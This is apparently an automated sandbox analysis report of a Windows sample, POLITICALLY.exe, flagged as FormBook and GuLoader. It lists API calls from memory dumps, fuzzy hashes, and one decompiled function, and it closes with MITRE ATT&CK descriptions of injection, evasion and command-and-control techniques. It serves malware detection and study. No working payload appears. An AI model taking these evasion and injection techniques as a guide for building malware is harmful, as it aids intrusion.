Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02d7b25315605f727bb5207a10a2cae60dbf1de28d02c37de35a1fcfe2197838
Instruction ID: 260c22d4c5c184775792959944959459a72165ecf389ed1bf320fe695a9b2a1e
Opcode Fuzzy Hash: 02d7b25315605f727bb5207a10a2cae60dbf1de28d02c37de35a1fcfe2197838
Instruction Fuzzy Hash: 3490027120100413F1116159451470704499BD0285F91C912A141A669D9696D956B161

Uniqueness

Uniqueness Score: -1.00%

Function 048699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048699AA

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cdc8f33f5964d8da462dc2d7cfaea6ffe10cf27bdb7c46330b15bff85eb626e5
Instruction ID: b73cc435a27f00a1a23cbe470706a84cb948eb03be4c9d06c690127ae623844b
Opcode Fuzzy Hash: cdc8f33f5964d8da462dc2d7cfaea6ffe10cf27bdb7c46330b15bff85eb626e5
Instruction Fuzzy Hash: 179002A134100442F10061594424B060445DBE1345F51C515E205A665D8659DC567166

Uniqueness

Uniqueness Score: -1.00%

Function 04869910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486991A

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69b179c8b82500521117d3cc9545f2ce84e6ae7ea2b7e5247736057ca9bca438
Instruction ID: 1abf5401fb2e85ca5cccd8f815302845d290fc21def390cbd8c9dc12aa31e37f
Opcode Fuzzy Hash: 69b179c8b82500521117d3cc9545f2ce84e6ae7ea2b7e5247736057ca9bca438
Instruction Fuzzy Hash: 759002B120100402F1407159441474604459BD0345F51C511A605A665E8699DDD976A5

Uniqueness

Uniqueness Score: -1.00%

Function 04869A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04869A5A

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50387e67c9082967e5f0ed5914810babbb32fe0d8b863772f545c6caa5008dc9
Instruction ID: a253e702fc39126a36c57e6869d56182b417a4ab7d912400c7ba19682bba1fb0
Opcode Fuzzy Hash: 50387e67c9082967e5f0ed5914810babbb32fe0d8b863772f545c6caa5008dc9
Instruction Fuzzy Hash: 9C90026121180042F20065694C24B0704459BD0347F51C615A114A665CC955D8656561

Uniqueness

Uniqueness Score: -1.00%

Function 030B6EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 030B6F88

Strings

net.dll, xrefs: 030B6F51, 030B6FD7, 030B6FAF, 030B6FBB, 030B6FE3
wininet.dll, xrefs: 030B6F3E, 030B6F47

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 47cb8c1c14608f463c3d5ddb211abf0544ada0c9bba08c212f5591c4767bbdef
Instruction ID: b9b52a44a0e813ece0746330ed52c92e9f1bc527e936def9aeb06132f07a9345
Opcode Fuzzy Hash: 47cb8c1c14608f463c3d5ddb211abf0544ada0c9bba08c212f5591c4767bbdef
Instruction Fuzzy Hash: 523192B5602709ABC715DF68C8A0FE7B7F8EB88700F04841DF61A5B240D771A445CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030B6ED7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 030B6F88

Strings

net.dll, xrefs: 030B6F51, 030B6FAF, 030B6FBB
wininet.dll, xrefs: 030B6F3E, 030B6F47

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: d53e5a82799a04c4f8ec11a32ca13ce6453cd25c9b95c70bddab951b6942fb5a
Instruction ID: e168894f8d6bd8f6d30f4cec006d45d212e6310721a966ac1340ffd6d4c39b32
Opcode Fuzzy Hash: d53e5a82799a04c4f8ec11a32ca13ce6453cd25c9b95c70bddab951b6942fb5a
Instruction Fuzzy Hash: A821B1B5602305ABD711DFA8C8A0FEBBBF8EF89700F04846DF6199B241D771A445CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030B84C2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030A3B93), ref: 030B84FD

Strings

.z`, xrefs: 030B84EC, 030B84F8

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: b50041bbaecb991e6ba17ad5f3ef70c4d60bca331d36a3b666398b7490929a63
Instruction ID: a89071cff26fe05bf30a20c36f9e3a5ede29aaaf81c8730dc9149ac3fe240de6
Opcode Fuzzy Hash: b50041bbaecb991e6ba17ad5f3ef70c4d60bca331d36a3b666398b7490929a63
Instruction Fuzzy Hash: 13F0BEBA2042446FD714EFA6DC40EEBB7ECAF84314F048959F91897611C630F9118AB1

Uniqueness

Uniqueness Score: -1.00%

Function 030B84D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030A3B93), ref: 030B84FD

Strings

.z`, xrefs: 030B84EC, 030B84F8

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: e096c0a896ecc545c184b5c38df20080c7919e418fd5d289897d0872dfb8e2ed
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 4EE01AB52002046BD714DF59CC44EE777ACEF88650F018555F9085B251C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 030A7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030A72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030A72DB

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction ID: 62f627a0f647ba517721e1cb66bfb78e77260042cb47ebbd41a0b22e72b48196
Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction Fuzzy Hash: CD01F231A8232876E720E6D89C02FFEB76C9B80F50F144019FF04BE1C1E6A4690683F5

Uniqueness

Uniqueness Score: -1.00%

Function 030A9B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 030A9B92

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: fa453da844e468f34507206eef6d246d3c9f03d7520c687834d56b6bfa863686
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 5F011EB9E1120DBBDF10DAE4ED41FDDB7B89B54208F044195AA089B241F631EB14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 030B8457, Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(030B3516,?,030B3C8F,030B3C8F,?,030B3516,?,?,?,?,?,00000000,00000000,?), ref: 030B84BD

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f08c3def515d8012f3dfc772f5cca3d8b3a70fe7ad2035d8527bc458b61f80a1
Instruction ID: 18c055c0fddf90f6d318984baf782cf1a38bbfce4d00a47153181b86c3682b86
Opcode Fuzzy Hash: f08c3def515d8012f3dfc772f5cca3d8b3a70fe7ad2035d8527bc458b61f80a1
Instruction Fuzzy Hash: 48F0AFB22012186FD714EF98EC85EF7B76DEF84250B04895AF9485B201C631E9108BE0

Uniqueness

Uniqueness Score: -1.00%

Function 030B8540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030B8594

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: ec6efd227701b8ad28ba618d465f1698ae2c942cb07d37e72581066ffe64897d
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: B901AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97250C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 030B7010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030ACCD0,?,?), ref: 030B704C

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 18af4abffdf86a2eaf63914344f617cc699ad87ce475af8ca067f21a85bd95c6
Instruction ID: 187bcc0fa01f92cb7a4e69f55eda18c77ec8fe04dc18862f8eac7034f396d996
Opcode Fuzzy Hash: 18af4abffdf86a2eaf63914344f617cc699ad87ce475af8ca067f21a85bd95c6
Instruction Fuzzy Hash: 6FE092373913043AE330A5A99C02FE7B3ACCBD1B20F640026FB0DEB2C0D595F80242A8

Uniqueness

Uniqueness Score: -1.00%

Function 030B8630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,030ACFA2,030ACFA2,?,00000000,?,?), ref: 030B8660

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 9e3a32184ccf7b339460a85fee2eba4b60f26a89a85176b206e99e9667ae836b
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 23E01AB52002086BDB10DF49CC84EE737ADEF88650F018555FA085B241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 030B8490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(030B3516,?,030B3C8F,030B3C8F,?,030B3516,?,?,?,?,?,00000000,00000000,?), ref: 030B84BD

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 7ecfa185e75d4d812f0acf5e60a846eacf87e438e0b4f88b0477a19f5587bb47
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: CCE012B6200208ABDB14EF99CC40EE777ACEF88650F118959FA085B241CA30F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 030AD410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,030A7C63,?), ref: 030AD43B

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 46255f62d8f740e5b48d55c0e2bb9d0a764bedd5d25e73d5186b1b1884653b28
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 13D0A7757503043BE710FBE89C03F6672CC5B54A00F494064F949DB3C3D960F4004565

Uniqueness

Uniqueness Score: -1.00%

Function 0486967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04869694

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 084ca1b77f0a0fcbcb48d37290cca1519beb264e6c042dce7f6b7ebbbb1be9ef
Instruction ID: ba5fb7957f3fa39b487b0fd5731a2274a276a56ad4750680a7e95f42ad559d44
Opcode Fuzzy Hash: 084ca1b77f0a0fcbcb48d37290cca1519beb264e6c042dce7f6b7ebbbb1be9ef
Instruction Fuzzy Hash: D5B02BB18010C0C5F700D76007087173D007BC0300F13C511D2034741A0338D080F1B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 030A6A95, Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

b, xrefs: 030A6B54
i, xrefs: 030A6B4D
a, xrefs: 030A6B5B
C, xrefs: 030A6B46
d, xrefs: 030A6B62

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: C$a$b$d$i
API String ID: 0-2334916691
Opcode ID: 3bbc872389be9ceed8d5d9a090f0f0f981a0d095a9f049a6177e86b2162ff47d
Instruction ID: 986b73721997903ed2d3a356cc8d52d21fa632db1732e99ea7e3c9230c05fcd2
Opcode Fuzzy Hash: 3bbc872389be9ceed8d5d9a090f0f0f981a0d095a9f049a6177e86b2162ff47d
Instruction Fuzzy Hash: 0C3190B5A0130CBAEB50DFA4EC81FFEB3B8EF86714F04840DE515AB240E775A5058B65

Uniqueness

Uniqueness Score: -1.00%

Function 030AC3ED, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b011b0a78df3b312459add5ff153f0ec44ff4927a49146312f7d32e0b708e09
Instruction ID: c00f5600d245b4e1f629bca39c57ab2a398da38ce9f88481a3cda1a2d70ff73a
Opcode Fuzzy Hash: 2b011b0a78df3b312459add5ff153f0ec44ff4927a49146312f7d32e0b708e09
Instruction Fuzzy Hash: FFE0205BF0534006D127D95D7C055F6F36487C3325F4401BBD50DDB043D11285194165

Uniqueness

Uniqueness Score: -1.00%

Function 030B565E, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bdcc1848a39015c5434ed34d28975a71b27109a25c6987925a5877424a3a3cb
Instruction ID: 430dfff36f0f1be930e54ea5ba5af9fc8a7ff51707ae43d5188a759258d2610d
Opcode Fuzzy Hash: 5bdcc1848a39015c5434ed34d28975a71b27109a25c6987925a5877424a3a3cb
Instruction Fuzzy Hash: D9E07D37A061080B87109E95B106194F720CBDA331FC16533CC196B200D911DC1A0686

Uniqueness

Uniqueness Score: -1.00%

Function 048BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E048BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0486CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E048B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E048B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x048bfdda
0x048bfde2
0x048bfde5
0x048bfdec
0x048bfdfa
0x048bfdff
0x048bfe0a
0x048bfe0f
0x048bfe17
0x048bfe1e
0x048bfe19
0x048bfe19
0x048bfe19
0x048bfe20
0x048bfe21
0x048bfe22
0x048bfe25
0x048bfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048BFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048BFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048BFE01

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: d4aede9f513f12c235c533849ccbbba4f5ccb9c273c6bf656b9c1fe9de94da94
Instruction ID: c7c0f653984e1fe9b15f2b43b7a3581ec5c56700fa03cf216452c5d69f2515db
Opcode Fuzzy Hash: d4aede9f513f12c235c533849ccbbba4f5ccb9c273c6bf656b9c1fe9de94da94
Instruction Fuzzy Hash: C5F02832600100BFE6201A49CC01E637B5ADB40734F140705F754D56E0DAA2B83086E5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report POLITICALLY.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Function 00404CFF, Relevance: 1.4, APIs: 1, Instructions: 179
memoryCOMMONCrypto

Function 0042D3B3, Relevance: 56.2, APIs: 24, Strings: 8, Instructions: 158
COMMON

Function 0040186C, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 316
COMMON